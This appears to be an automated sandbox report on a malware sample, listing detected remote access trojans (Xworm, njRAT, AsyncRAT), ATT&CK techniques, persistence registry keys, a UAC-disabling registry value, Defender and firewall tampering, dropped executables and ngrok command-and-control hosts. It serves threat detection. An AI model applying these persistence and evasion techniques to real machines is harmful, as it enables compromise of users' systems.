ammyyadmin | e4ec3a45621dd556deeea5f953fa05909c82630e9f17baf6b14272a0360d62d1

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm
njRAT/Bladabindi
Widely used RAT written in .NET.
trojan njrat

Async RAT payload 12 IoCs

rat

resource	yara_rule
behavioral1/files/0x000a000000025f94-2633.dat	family_asyncrat
behavioral1/files/0x0008000000025f92-2726.dat	family_asyncrat
behavioral1/files/0x001800000002ae21-2966.dat	family_asyncrat
behavioral1/files/0x001900000002ae83-3270.dat	family_asyncrat
behavioral1/files/0x001c00000002ae49-3506.dat	family_asyncrat
behavioral1/files/0x001a00000002ae66-3756.dat	family_asyncrat
behavioral1/files/0x001e00000002ae75-4485.dat	family_asyncrat
behavioral1/files/0x002300000002ae48-4590.dat	family_asyncrat
behavioral1/files/0x001b00000002af5d-4711.dat	family_asyncrat
behavioral1/files/0x001c00000002af33-4882.dat	family_asyncrat
behavioral1/files/0x001b00000002afac-4899.dat	family_asyncrat
behavioral1/files/0x001c00000002afbe-5451.dat	family_asyncrat

Command and Scripting Interpreter: PowerShell 1 TTPs 19 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
2204	powershell.exe
424	powershell.exe
4332	powershell.exe
5472	powershell.exe
7864	powershell.exe
8416	powershell.exe
4904	powershell.exe
2612	powershell.exe
2824	powershell.exe
2892	powershell.exe
5272	powershell.exe
508	powershell.exe
1504	powershell.exe
4448	powershell.exe
5656	powershell.exe
784	powershell.exe
8060	powershell.exe
4612	powershell.exe
4612	powershell.exe

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002

Downloads MZ/PE file 24 IoCs

flow	pid	Process
296	5016	4363463463464363463463463.exe
296	5016	4363463463464363463463463.exe
296	5016	4363463463464363463463463.exe
296	5016	4363463463464363463463463.exe
237	4476	4363463463464363463463463.exe
259	4476	4363463463464363463463463.exe
389	5016	4363463463464363463463463.exe
348	4476	4363463463464363463463463.exe
315	4476	4363463463464363463463463.exe
315	4476	4363463463464363463463463.exe
315	4476	4363463463464363463463463.exe
315	4476	4363463463464363463463463.exe
315	4476	4363463463464363463463463.exe
315	4476	4363463463464363463463463.exe
315	4476	4363463463464363463463463.exe
315	4476	4363463463464363463463463.exe
315	4476	4363463463464363463463463.exe
236	4476	4363463463464363463463463.exe
289	4476	4363463463464363463463463.exe
334	5016	4363463463464363463463463.exe
351	5016	4363463463464363463463463.exe
258	4476	4363463463464363463463463.exe
390	5016	4363463463464363463463463.exe
413	5016	4363463463464363463463463.exe

Modifies Windows Firewall 2 TTPs 7 IoCs

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
8572	netsh.exe
1992	netsh.exe
5752	netsh.exe
6736	netsh.exe
9632	netsh.exe
3476	netsh.exe
9580	netsh.exe

Stops running service(s) 4 TTPs
defense_evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002
A potential corporate email address has been identified in the URL: [email protected]
phishing

Clipboard Data 1 TTPs 4 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
6072	cmd.exe
6000	powershell.exe
6792	cmd.exe
7196	powershell.exe

Drops startup file 9 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Terraria-Multiplayer-Fix-Online.lnk	XClient.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dllhost.exe	dllhost.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dllhost.url	dllhost.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\603620ea0fe398ac1d9cd08d637e8563.exe	Runtime Broker.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\603620ea0fe398ac1d9cd08d637e8563.exe	Runtime Broker.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Terraria-Multiplayer-Fix-Online.lnk	XClient.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\System.lnk	svchost.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\System.lnk	svchost.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dllhost.exe	dllhost.exe

Executes dropped EXE 32 IoCs

pid	Process
4476	4363463463464363463463463.exe
4472	foggy-mountains.exe
664	Obfuscated.exe
1368	Obfuscated.exe
736	logon.exe
1272	c1.exe
5016	4363463463464363463463463.exe
1400	Monitor.exe
4732	handeltest.exe
2976	Syncing.exe
220	sync.exe
2096	Client.exe
2232	XClient.exe
4512	Complexo%20v4.exe
2892	Terraria-Multiplayer-Fix-Online.exe
396	cdb.exe
1900	svchost.exe
4868	kg.exe
1204	main.exe
4708	dllhost.exe
4888	TCP.exe
1468	dllhost.exe
2888	System.exe
2824	Terraria-Multiplayer-Fix-Online.exe
1304	Server.exe
4856	Charter.exe
4136	Taskmgr.exe
5012	GoodFrag.exe
2832	NOTallowedtocrypt.exe
3704	76y5trfed675ytg.exe
736	svchost.exe
3612	Runtime Broker.exe

Loads dropped DLL 7 IoCs

pid	Process
4472	foggy-mountains.exe
4472	foggy-mountains.exe
1368	Obfuscated.exe
1368	Obfuscated.exe
1368	Obfuscated.exe
1368	Obfuscated.exe
1368	Obfuscated.exe

Themida packer 10 IoCs

Detects Themida, an advanced Windows software protection system.

themida

resource	yara_rule
behavioral1/files/0x000400000002570a-3192.dat	themida
behavioral1/memory/5188-3195-0x0000000140000000-0x0000000140951000-memory.dmp	themida
behavioral1/memory/5188-3296-0x0000000140000000-0x0000000140951000-memory.dmp	themida
behavioral1/memory/5516-3301-0x0000000140000000-0x0000000140951000-memory.dmp	themida
behavioral1/memory/6060-3373-0x00007FF6186A0000-0x00007FF6195BF000-memory.dmp	themida
behavioral1/memory/6060-3422-0x00007FF6186A0000-0x00007FF6195BF000-memory.dmp	themida
behavioral1/memory/5188-3492-0x0000000140000000-0x0000000140951000-memory.dmp	themida
behavioral1/memory/6060-3531-0x00007FF6186A0000-0x00007FF6195BF000-memory.dmp	themida
behavioral1/memory/5520-3533-0x00007FF7F7620000-0x00007FF7F853F000-memory.dmp	themida
behavioral1/memory/5520-3566-0x00007FF7F7620000-0x00007FF7F853F000-memory.dmp	themida

Adds Run key to start application 2 TTPs 12 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000\Software\Microsoft\Windows\CurrentVersion\Run\6754ytr756ytr7654yretg8765uyt = "\"C:\\Users\\Admin\\AppData\\Roaming\\kjhgfdc\\76y5trfed675ytg.exe\""	76y5trfed675ytg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\6754ytr756ytr7654yretg8765uyt = "\"C:\\Users\\Admin\\AppData\\Roaming\\kjhgfdc\\76y5trfed675ytg.exe\""	76y5trfed675ytg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\6754ytr756ytr7654yretg8765uyt = "\"C:\\Users\\Admin\\AppData\\Roaming\\kjhgfdc\\76y5trfed675ytg.exe\""	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000\Software\Microsoft\Windows\CurrentVersion\Run\603620ea0fe398ac1d9cd08d637e8563 = "\"C:\\Users\\Admin\\AppData\\Roaming\\Runtime Broker.exe\" .."	Runtime Broker.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\603620ea0fe398ac1d9cd08d637e8563 = "\"C:\\Users\\Admin\\AppData\\Roaming\\Runtime Broker.exe\" .."	Runtime Broker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000\Software\Microsoft\Windows\CurrentVersion\Run\Terraria-Multiplayer-Fix-Online = "C:\\Users\\Admin\\AppData\\Local\\Terraria-Multiplayer-Fix-Online.exe"	XClient.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\dllhost.exe = "\"C:\\ProgramData\\dllhost.exe\" .."	dllhost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000\Software\Microsoft\Windows\CurrentVersion\Run\6754ytr756ytr7654yretg8765uyt = "\"C:\\Users\\Admin\\AppData\\Roaming\\kjhgfdc\\76y5trfed675ytg.exe\""	NOTallowedtocrypt.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000\Software\Microsoft\Windows\CurrentVersion\Run\6754ytr756ytr7654yretg8765uyt = "\"C:\\Users\\Admin\\AppData\\Roaming\\kjhgfdc\\76y5trfed675ytg.exe\""	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000\Software\Microsoft\Windows\CurrentVersion\Run\System = "C:\\Users\\Admin\\AppData\\Roaming\\System.exe"	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000\Software\Microsoft\Windows\CurrentVersion\Run\dllhost.exe = "\"C:\\ProgramData\\dllhost.exe\" .."	dllhost.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\6754ytr756ytr7654yretg8765uyt = "\"C:\\Users\\Admin\\AppData\\Roaming\\kjhgfdc\\76y5trfed675ytg.exe\""	NOTallowedtocrypt.exe

Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
defense_evasion

File Deletion
T1070.004

Legitimate hosting services abused for malware hosting/C2 1 TTPs 43 IoCs

Web Service

T1102

flow	ioc
453	drive.google.com
732	drive.google.com
1009	0.tcp.eu.ngrok.io
1065	raw.githubusercontent.com
1009	1.tcp.ap.ngrok.io
1053	raw.githubusercontent.com
158	drive.google.com
448	drive.google.com
717	raw.githubusercontent.com
942	0.tcp.in.ngrok.io
1171	raw.githubusercontent.com
450	raw.githubusercontent.com
456	0.tcp.eu.ngrok.io
758	raw.githubusercontent.com
895	raw.githubusercontent.com
456	drive.google.com
735	2.tcp.ngrok.io
1087	raw.githubusercontent.com
15	drive.google.com
237	raw.githubusercontent.com
315	raw.githubusercontent.com
453	raw.githubusercontent.com
296	raw.githubusercontent.com
456	raw.githubusercontent.com
456	1.tcp.ap.ngrok.io
930	raw.githubusercontent.com
614	raw.githubusercontent.com
735	0.tcp.in.ngrok.io
735	0.tcp.eu.ngrok.io
157	drive.google.com
435	0.tcp.in.ngrok.io
456	0.tcp.in.ngrok.io
588	raw.githubusercontent.com
453	6.tcp.eu.ngrok.io
520	raw.githubusercontent.com
890	raw.githubusercontent.com
1118	6.tcp.eu.ngrok.io
5	raw.githubusercontent.com
322	0.tcp.in.ngrok.io
372	0.tcp.in.ngrok.io
453	0.tcp.in.ngrok.io
453	2.tcp.ngrok.io
481	raw.githubusercontent.com

Looks up external IP address via web service 4 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
456	ip-api.com
735	ip-api.com
917	ip-api.com
1119	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Power Settings 1 TTPs 4 IoCs

powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

persistence

Power Settings

T1653

pid	Process
3828	powercfg.exe
5180	powercfg.exe
4500	powercfg.exe
5220	powercfg.exe

Enumerates processes with tasklist 1 TTPs 8 IoCs

Process Discovery

T1057

pid	Process
5712	tasklist.exe
7048	tasklist.exe
7748	tasklist.exe
7720	tasklist.exe
7344	tasklist.exe
3680	tasklist.exe
6912	tasklist.exe
1824	tasklist.exe

Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs

persistence privilege_escalation

Hidden Files and Directories

T1564.001

pid	Process
976	cmd.exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 3704 set thread context of 3764	3704	76y5trfed675ytg.exe	252
PID 3764 set thread context of 1372	3764	iexplore.exe	257

UPX packed file 22 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/5240-3939-0x00007FFB74DB0000-0x00007FFB75398000-memory.dmp	upx
behavioral1/memory/5240-3946-0x00007FFB95A90000-0x00007FFB95AB4000-memory.dmp	upx
behavioral1/memory/5240-3947-0x00007FFB9A460000-0x00007FFB9A46F000-memory.dmp	upx
behavioral1/memory/5240-3959-0x00007FFB95A10000-0x00007FFB95A33000-memory.dmp	upx
behavioral1/memory/5240-3960-0x00007FFB77900000-0x00007FFB77A73000-memory.dmp	upx
behavioral1/memory/5240-3965-0x00007FFB91FC0000-0x00007FFB92078000-memory.dmp	upx
behavioral1/memory/5240-3969-0x00007FFB79360000-0x00007FFB7947C000-memory.dmp	upx
behavioral1/memory/5240-3968-0x00007FFB972C0000-0x00007FFB972CD000-memory.dmp	upx
behavioral1/memory/5240-3967-0x00007FFB959A0000-0x00007FFB959B4000-memory.dmp	upx
behavioral1/memory/5240-3983-0x00007FFB95A90000-0x00007FFB95AB4000-memory.dmp	upx
behavioral1/memory/5240-4000-0x00007FFB9A460000-0x00007FFB9A46F000-memory.dmp	upx
behavioral1/memory/5240-3966-0x00007FFB74DB0000-0x00007FFB75398000-memory.dmp	upx
behavioral1/memory/5240-3964-0x00007FFB74A30000-0x00007FFB74DA5000-memory.dmp	upx
behavioral1/memory/5240-3963-0x00007FFB959C0000-0x00007FFB959EE000-memory.dmp	upx
behavioral1/memory/5240-3962-0x00007FFB99660000-0x00007FFB9966D000-memory.dmp	upx
behavioral1/memory/5240-4012-0x00007FFB95A10000-0x00007FFB95A33000-memory.dmp	upx
behavioral1/memory/5240-3961-0x00007FFB959F0000-0x00007FFB95A09000-memory.dmp	upx
behavioral1/memory/5240-3958-0x00007FFB95A40000-0x00007FFB95A59000-memory.dmp	upx
behavioral1/memory/5240-3957-0x00007FFB95A60000-0x00007FFB95A8D000-memory.dmp	upx
behavioral1/memory/5240-4036-0x00007FFB77900000-0x00007FFB77A73000-memory.dmp	upx
behavioral1/memory/5240-4080-0x00007FFB959F0000-0x00007FFB95A09000-memory.dmp	upx
behavioral1/files/0x001a00000002b000-5400.dat	upx

Drops file in Windows directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SystemTemp	setup.exe
File opened for modification	C:\Windows\SystemTemp\Crashpad\metadata	setup.exe
File opened for modification	C:\Windows\SystemTemp\Crashpad\settings.dat	setup.exe
File opened for modification	C:\Windows\SystemTemp	chrome.exe

Launches sc.exe 9 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
3348	sc.exe
4608	sc.exe
5224	sc.exe
4468	sc.exe
4964	sc.exe
1224	sc.exe
5940	sc.exe
5676	sc.exe
4404	sc.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

Detects Pyinstaller 3 IoCs

pyinstaller

resource	yara_rule
behavioral1/files/0x001c00000002ab62-2141.dat	pyinstaller
behavioral1/files/0x001b00000002ad5f-4182.dat	pyinstaller
behavioral1/files/0x001a00000002b005-5462.dat	pyinstaller

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe

Program crash 8 IoCs

pid	pid_target	Process	procid_target
5236	3348	WerFault.exe	330
4988	3004	WerFault.exe	672
6612	4208	WerFault.exe	751
8512	7732	WerFault.exe	826
8656	784	WerFault.exe	793
9464	8392	WerFault.exe	894
9688	1776	WerFault.exe	886
7404	10052	WerFault.exe	963

System Location Discovery: System Language Discovery 1 TTPs 41 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	dllhost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	TCP.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	handeltest.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	main.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Runtime Broker.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	4363463463464363463463463.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	iexplore.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	logon.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Syncing.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	kg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Client.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	GoodFrag.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	NOTallowedtocrypt.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	foggy-mountains.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	4363463463464363463463463.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sync.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	dllhost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	choice.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	76y5trfed675ytg.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 24 IoCs

Adversaries may check for Internet connectivity on compromised systems.

Internet Connection Discovery

T1016.001

pid	Process
1768	PING.EXE
6160	PING.EXE
6156	PING.EXE
8764	PING.EXE
9512	PING.EXE
9448	PING.EXE
6556	PING.EXE
4908	PING.EXE
4688	PING.EXE
5748	PING.EXE
6648	PING.EXE
8916	PING.EXE
4688	PING.EXE
5460	PING.EXE
6860	PING.EXE
8212	PING.EXE
6116	PING.EXE
2200	PING.EXE
7740	PING.EXE
6696	PING.EXE
7676	PING.EXE
9020	PING.EXE
5836	PING.EXE
6476	PING.EXE

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 4 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

Wi-Fi Discovery

T1016.002

pid	Process
5520	cmd.exe
7700	netsh.exe
7404	netsh.exe
6044	cmd.exe

System Time Discovery 1 TTPs 1 IoCs

Adversary may gather the system time and/or time zone settings from a local or remote system.

System Time Discovery

T1124

pid	Process
1992	netsh.exe

Checks processor information in registry 2 TTPs 14 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe

Delays execution with timeout.exe 4 IoCs

pid	Process
9208	timeout.exe
8892	timeout.exe
852	timeout.exe
5924	timeout.exe

Detects videocard installed 1 TTPs 2 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

pid	Process
2492	WMIC.exe
7472	WMIC.exe

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe

Gathers system information 1 TTPs 2 IoCs

Runs systeminfo.exe.

System Information Discovery

pid	Process
6308	systeminfo.exe
2844	systeminfo.exe

GoLang User-Agent 1 IoCs

Uses default user-agent string defined by GoLang HTTP packages.

description	flow	ioc
HTTP User-Agent header	945	Go-http-client/1.1

Kills process with taskkill 39 IoCs

pid	Process
6184	taskkill.exe
6888	taskkill.exe
7008	taskkill.exe
10088	taskkill.exe
7924	taskkill.exe
5528	taskkill.exe
7208	taskkill.exe
3544	taskkill.exe
3112	taskkill.exe
6520	taskkill.exe
9644	taskkill.exe
6580	taskkill.exe
10204	taskkill.exe
9956	taskkill.exe
1612	taskkill.exe
5676	taskkill.exe
7328	taskkill.exe
8616	taskkill.exe
9120	taskkill.exe
7296	taskkill.exe
5348	taskkill.exe
9236	taskkill.exe
9092	taskkill.exe
9692	taskkill.exe
7324	taskkill.exe
9124	taskkill.exe
6300	taskkill.exe
5312	taskkill.exe
2480	taskkill.exe
9944	taskkill.exe
7924	taskkill.exe
5844	taskkill.exe
5816	taskkill.exe
8812	taskkill.exe
9552	taskkill.exe
9748	taskkill.exe
8768	taskkill.exe
9688	taskkill.exe
9776	taskkill.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133822392204900110"	chrome.exe

Modifies registry class 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616193"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4"	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02020202	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\GroupByDirection = "1"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0	chrome.exe
